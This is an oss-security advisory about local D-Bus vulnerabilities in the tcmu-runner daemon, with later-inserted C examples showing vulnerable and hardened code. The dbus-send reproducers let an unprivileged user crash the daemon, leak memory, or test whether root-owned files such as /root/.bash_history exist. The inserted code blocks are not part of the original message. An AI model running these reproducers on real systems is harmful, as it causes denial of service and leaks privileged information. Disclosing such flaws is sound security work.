List: oss-security
Subject: [oss-security] tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing local DoS, infor
From: Matthias Gerstner <mgerstner () suse ! de>
Date: 2017-07-24 10:12:04
Message-ID: 20170724101204.GA22772 () f195 ! suse ! de
A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.
I've requested CVEs for these issues; the request is still pending. I will
update once I've got them.
It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.
Package: https://github.com/open-iscsi/tcmu-runner
------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.
For example, the "hosts" variable in glfs_check_config() is not zero-initialized
but is always freed on error, causing an invalid free and/or invalid memory
accesses.
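The bug class described above (a pointer that is only assigned on the success path but freed on every error path) is easy to see side by side with its fix. The following is an added example, not tcmu-runner's code: it models a glfs-style check_config over a hypothetical config syntax "glfs/<hosts>@<volume>/<path>" (the syntax, the CFG_PREFIX macro and both function names are assumptions). The vulnerable variant is kept for comparison only and is never called; the hardened variant initializes every owned pointer to NULL and uses a single exit path, relying on free(NULL) being a defined no-op.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical config syntax for this example: "glfs/<hosts>@<volume>/<path>",
 * <hosts> being a comma-separated list.  This is NOT tcmu-runner's real parser;
 * it only models the bug class named in the advisory. */
#define CFG_PREFIX "glfs/"

/* VULNERABLE pattern, kept only for comparison and never called: 'hosts' is
 * assigned late, but every error path runs free(hosts), so an early error
 * (e.g. the reproducer's "something") frees an indeterminate pointer. */
bool glfs_check_config_vulnerable(const char *cfg)
{
    char *hosts;                         /* BUG: never initialised */
    const char *body, *at;

    if (!cfg || strncmp(cfg, CFG_PREFIX, strlen(CFG_PREFIX)) != 0)
        goto fail;                       /* reaches free(hosts) with garbage */
    body = cfg + strlen(CFG_PREFIX);
    at = strchr(body, '@');
    if (!at || at == body)
        goto fail;
    hosts = strndup(body, (size_t)(at - body));
    if (!hosts)
        goto fail;
    if (!strchr(at + 1, '/'))
        goto fail;
    free(hosts);
    return true;
fail:
    free(hosts);                         /* invalid free on the early errors */
    return false;
}

/* HARDENED version: every owned pointer starts as NULL, there is exactly one
 * exit path, and free(NULL) is a defined no-op, so no error path can free an
 * indeterminate pointer.  It also rejects empty hosts, volume or path. */
bool glfs_check_config_hardened(const char *cfg)
{
    char *hosts = NULL, *volume = NULL;
    const char *body, *at, *slash;
    bool ok = false;

    if (!cfg || strncmp(cfg, CFG_PREFIX, strlen(CFG_PREFIX)) != 0)
        goto out;
    body = cfg + strlen(CFG_PREFIX);
    at = strchr(body, '@');
    if (!at || at == body)
        goto out;
    hosts = strndup(body, (size_t)(at - body));
    if (!hosts)
        goto out;
    slash = strchr(at + 1, '/');
    if (!slash || slash == at + 1 || slash[1] == '\0')
        goto out;
    volume = strndup(at + 1, (size_t)(slash - (at + 1)));
    if (!volume)
        goto out;
    /* a host list like "a,,b" or ",a" has an empty entry: reject it */
    for (const char *p = hosts; *p; p++)
        if (*p == ',' && (p == hosts || p[1] == ',' || p[1] == '\0'))
            goto out;
    ok = true;
out:
    free(volume);                        /* safe even when still NULL */
    free(hosts);
    return ok;
}

int main(void)
{
    /* constructed sample inputs, including the advisory's "something" */
    const char *inputs[] = { "glfs/srv1,srv2@vol/images/disk.img", "something",
                             "glfs/srv@vol", "glfs/a,,b@vol/x" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-40s -> %s\n", inputs[i],
               glfs_check_config_hardened(inputs[i]) ? "valid" : "rejected");
    return 0;
}
```

Compiling with -Wall makes the difference visible: the compiler flags 'hosts' in the vulnerable function as possibly uninitialised, while the hardened function produces no warning and returns a plain false for every malformed string a bus caller can send.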
References:
- The check_config callback implementation was recently removed upstream
in this commit:
https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user; afterwards the tcmu-runner daemon
# will have crashed with a segmentation fault
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/glfs \
    org.kernel.TCMUService1.CheckConfig string:something
------------------------------------------------------------------------
UnregisterHandler dbus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu runner handler as parameter and cause a NULL
pointer dereference.
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user; afterwards the tcmu-runner daemon
# will have crashed with a segmentation fault
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler
------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user; it will attempt to unregister the
# locally loaded qcow handler, and afterwards the tcmu-runner daemon will have
# crashed with a segmentation fault
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow
------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Done repeatedly, this would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or for other system components that fail to acquire memory
as a result.
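The three HandlerManager1 issues above (NULL pointer dereference for an unknown handler name, NULL pointer dereference for an internally loaded handler, and leaks in (Un)RegisterHandler) share one root cause: a registry whose lookup result is not checked and whose error paths do not release what was allocated. The following is an added example, not tcmu-runner's code: a hypothetical handler registry (all names, the handler_origin enum and the reg_result codes are assumptions) written so that every bus request ends in an error code rather than a crash, and so that no allocation survives a failed request.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical registry: handlers loaded internally via dlopen() versus
 * handlers announced by an external process over D-Bus. Not tcmu-runner code. */
enum handler_origin { HANDLER_INTERNAL, HANDLER_DBUS };

struct handler {
    char *name;
    char *cfg_desc;
    enum handler_origin origin;
    struct handler *next;
};

/* results reported back to the D-Bus caller; the daemon itself never crashes */
enum reg_result { REG_OK = 0, REG_EINVAL, REG_ENOMEM, REG_EEXIST, REG_ENOENT, REG_EPERM };

static struct handler *handlers;         /* linked-list head */

/* Lookup may legitimately fail: callers must test for NULL instead of
 * dereferencing the result. */
struct handler *find_handler(const char *name)
{
    for (struct handler *h = handlers; h; h = h->next)
        if (strcmp(h->name, name) == 0)
            return h;
    return NULL;
}

static void free_handler(struct handler *h)
{
    if (!h)
        return;
    free(h->name);
    free(h->cfg_desc);
    free(h);
}

/* Every allocation is released on every error path, so a caller hammering
 * RegisterHandler with bad or duplicate input cannot grow the daemon's heap. */
enum reg_result register_handler(const char *name, const char *cfg_desc,
                                 enum handler_origin origin)
{
    struct handler *h;

    if (!name || !*name || !cfg_desc)
        return REG_EINVAL;
    if (find_handler(name))
        return REG_EEXIST;               /* checked before anything is allocated */

    h = calloc(1, sizeof *h);
    if (!h)
        return REG_ENOMEM;
    h->name = strdup(name);
    h->cfg_desc = strdup(cfg_desc);
    if (!h->name || !h->cfg_desc) {
        free_handler(h);                 /* frees whichever strdup succeeded */
        return REG_ENOMEM;
    }
    h->origin = origin;
    h->next = handlers;
    handlers = h;
    return REG_OK;
}

/* Unknown names get REG_ENOENT; internally loaded handlers, which have no
 * D-Bus owner to detach, get REG_EPERM.  Neither path touches a NULL pointer. */
enum reg_result unregister_handler(const char *name)
{
    if (!name)
        return REG_EINVAL;
    for (struct handler **pp = &handlers; *pp; pp = &(*pp)->next) {
        struct handler *h = *pp;
        if (strcmp(h->name, name) != 0)
            continue;
        if (h->origin == HANDLER_INTERNAL)
            return REG_EPERM;
        *pp = h->next;
        free_handler(h);
        return REG_OK;
    }
    return REG_ENOENT;
}

size_t handler_count(void)
{
    size_t n = 0;
    for (struct handler *h = handlers; h; h = h->next)
        n++;
    return n;
}

/* release everything, e.g. at daemon shutdown; leaves nothing for valgrind */
void reset_registry(void)
{
    while (handlers) {
        struct handler *next = handlers->next;
        free_handler(handlers);
        handlers = next;
    }
}

int main(void)
{
    register_handler("qcow", "qcow image path", HANDLER_INTERNAL);
    printf("unregister fake_handler -> %d\n", unregister_handler("fake_handler"));
    printf("unregister qcow         -> %d\n", unregister_handler("qcow"));
    reset_registry();
    return 0;
}
```

Running the program under valgrind --leak-check=full, as the reproducer below does for the daemon, is the quickest way to confirm the "definitely lost" count stays at zero no matter how often register_handler() is called with rejected or duplicate names.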
References:
- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490
Reproducer:
# *stop* the tcmu-runner service as root
systemctl stop tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff
# ctrl-c the valgrind process and you'll see an amount of "definitely lost"
# bytes. When doing the same without the dbus-send calls this should be zero
# "definitely lost" bytes.
------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------
Description:
A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.
This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.
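Where a privileged daemon must answer "does this file exist" on behalf of an unprivileged bus caller, the existence answer should only ever be given for paths the caller is entitled to ask about. The following is an added example, not tcmu-runner's code: it confines the checked path to a hypothetical allow-listed directory (IMAGE_BASE, the function names and the check_result codes are assumptions) using purely lexical normalisation, so that validation itself performs no file-system access and a path like the reproducer's "//root/.bash_history" or a "../" escape gets the same uniform REJECTED answer regardless of whether the target exists.

```c
#define _POSIX_C_SOURCE 200809L
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical allow-listed image directory; not a tcmu-runner setting. */
#define IMAGE_BASE "/var/lib/tcmu-images"

/* Lexically normalise an absolute path: collapse repeated '/', drop '.',
 * resolve '..' without touching the file system, so validation itself
 * reveals nothing about which files exist.  Relative or over-long paths
 * are rejected. */
bool normalize_path(const char *in, char *out, size_t outlen)
{
    char buf[PATH_MAX], *save = NULL;
    size_t n = 0;

    if (!in || in[0] != '/' || strlen(in) >= sizeof buf || outlen < 2)
        return false;
    strcpy(buf, in);
    out[0] = '\0';
    for (char *tok = strtok_r(buf, "/", &save); tok; tok = strtok_r(NULL, "/", &save)) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {    /* pop one component, never above "/" */
            char *last = strrchr(out, '/');
            if (last) {
                *last = '\0';
                n = strlen(out);
            }
            continue;
        }
        if (n + 1 + strlen(tok) >= outlen)
            return false;
        out[n++] = '/';
        strcpy(out + n, tok);
        n += strlen(tok);
    }
    if (n == 0)
        strcpy(out, "/");
    return true;
}

/* Convenience wrapper returning a static buffer (not thread-safe). */
const char *normalized(const char *in)
{
    static char buf[PATH_MAX];
    return normalize_path(in, buf, sizeof buf) ? buf : NULL;
}

/* True when 'path' lies strictly inside 'base' after normalisation.  The
 * prefix test must end on a component boundary so that base "/a/b" does
 * not admit "/a/bc". */
bool path_within_base(const char *path, const char *base)
{
    char np[PATH_MAX], nb[PATH_MAX];
    size_t bl;

    if (!normalize_path(path, np, sizeof np) || !normalize_path(base, nb, sizeof nb))
        return false;
    bl = strlen(nb);
    if (bl == 1)                         /* base is "/" */
        return np[1] != '\0';
    return strncmp(np, nb, bl) == 0 && np[bl] == '/' && np[bl + 1] != '\0';
}

enum check_result { CHECK_REJECTED = -1, CHECK_MISSING = 0, CHECK_PRESENT = 1 };

/* Existence is reported only for paths inside the allow-listed base; anything
 * else gets the same REJECTED answer with no file-system access at all, so a
 * caller learns nothing about root-owned files elsewhere. */
enum check_result qcow_check_config_confined(const char *cfg, const char *base)
{
    char np[PATH_MAX];

    if (!path_within_base(cfg, base) || !normalize_path(cfg, np, sizeof np))
        return CHECK_REJECTED;
    return access(np, F_OK) == 0 ? CHECK_PRESENT : CHECK_MISSING;
}

int main(void)
{
    /* constructed probes: the advisory's string, an escape attempt, a valid image */
    const char *probes[] = { "//root/.bash_history",
                             "/var/lib/tcmu-images/../../../root/.bash_history",
                             "/var/lib/tcmu-images/disk.qcow2" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-50s -> %d\n", probes[i], qcow_check_config_confined(probes[i], IMAGE_BASE));
    return 0;
}
```

Note that the confinement is lexical on purpose: calling realpath() first would itself fail differently for missing and present components and so leak the very information the check is meant to withhold. Symlinks inside the allow-listed directory are a separate concern the daemon's own file handling has to address.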
References:
- upstream fix: this one is difficult to fix, so upstream asked me to remove
all check_config callbacks instead:
https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491
Reproducer:
# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user; it will return True if
# /root/.bash_history exists, False otherwise
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/qcow \
    org.kernel.TCMUService1.CheckConfig string://root/.bash_history
Regards
Matthias
--
Matthias Gerstner <matthias.gerstner@suse.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290
SUSE Linux GmbH
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)